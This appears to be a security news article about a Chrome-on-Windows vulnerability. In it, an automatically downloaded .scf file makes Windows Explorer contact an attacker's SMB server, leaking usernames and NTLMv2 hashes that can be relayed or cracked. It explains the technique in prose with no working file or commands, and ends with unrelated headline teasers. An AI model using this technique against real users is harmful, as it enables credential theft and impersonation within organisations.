Google Chrome vulnerability allows hackers to steal people’s Windows login credentials and launch SMB (Server Message Block) relay attacks, according to security experts. The attack technique that can allow credential theft is a combination of two different techniques, one of which was borrowed from the Stuxnet campaign and the other from a technique demonstrated at a Black Hat conference by two security researchers.
The Google Chrome vulnerability was uncovered by DefenceCode security engineer Bosko Stankovic, who said in a blog that he found the flaw in a default configuration of Chrome running on Windows 10.
He added that this vulnerability poses a threat not just to privileged users such as administrators but also to regular users and organisations since it “it enables the attacker to impersonate members of the organisation”. Hackers can also “immediately reuse” stolen credentials and privileges gained to launch further attacks “on other users or gain access and control of IT resources”.
DefenceCode said it had not informed Google about the vulnerability. However, Google told Threatpost that it was aware of the issue and “taking necessary action.”
According to Stankovic, the attack is simple and involves victims being tricked into clicking on a malicious link, which triggers an automatic download a Windows Explorer Shell Command File or SCF file. The SCF file lies dormant until the victim opens the download directory folder, after which it attempts to exfiltrate data linked with a Windows icon located on the hacker’s server. This in turn provides the attacker with the victim’s username and hashed password.
Threatpost cited independent security researchers as having noted that this flaw is not exclusively tied to how Chrome deals SCF files, rather it also relates to how Windows handles SCF files.
“Organisations that allow remote access to services such as Microsoft Exchange (Outlook Anywhere) and use NTLM as authentication method, may be vulnerable to SMB relay attacks, allowing the attacker to impersonate the victim, accessing data and systems without having to crack the password,” Stankovic warned.
.SCF file + SMB Protocol + Google Chrome
One such file type is Windows Explorer Shell Command File (.scf files). It supports some Windows Explorer commands like showing desktop or opening a Windows Explorer window. A .scf file, if stored on disk, retrieves an icon file when it’s loaded in a Windows Explorer window.
Serbian security researcher Bosko Stankovic of DefenseCode combined these two concepts of SMB protocol and .scf file to devise a new type of hacking attack.
A .scf file can be used to trick Windows into authenticating a remote SMB server. This is how the contents of file will look like:
After a user downloads the file on system, it’s triggered as soon as download folder is opened to view the file. Please note that one doesn’t need to click/open this file; Windows File Explorer automatically attempts to load the icon.
The rest of the work is done by the remote SMB server which is set up by some notorious force. The server is ready to capture user’s username and NTLMv2 password hash, which can be cracked offline. The server can also be configured to relay this connection to some external service that needs such credentials.
An The Seafrontier suffered a hole above the water line and damage to the superstructure oil tanker and a bulk carrier have smashed into...
Chad Koczera photographed Shelly Island by drone. A new island has appeared off the coast of North Carolina but people have been warne...
Renwick Haddow created ‘trendy’ companies and duped investors into thinking they were big successes, authorities in New York allege ...
Onion Deep Web: Want some top 31 list of onion deep websites, but one question arise what kind of top 31 lists you want of hidden web, wh...
A prominent Vietnamese blogger has been sentenced to 10 years in prison after being found guilty of distorting government policies and de...
The bone is believed to be from a Harlan's ground sloth. Pic: LA Brea Tar Pits Workmen digging a new train line had an "amazing...
Hackers use various methods for hacking a facebook account password of victim. Today I tell you what type of methods hackers are using for h...
The social media media was agog with Evans (the Notorious/Billionaire Kidnapper) stories of how he was arrested, modus of operations, his...
Saudi officials deny claims Mohammed bin Nayef is under house arrest while power transition takes effect The deposed Saudi crown pri...
Looking for best best hacking books? We have short listed some of the highly recommended books for beginners and advanced hackers. The ethic...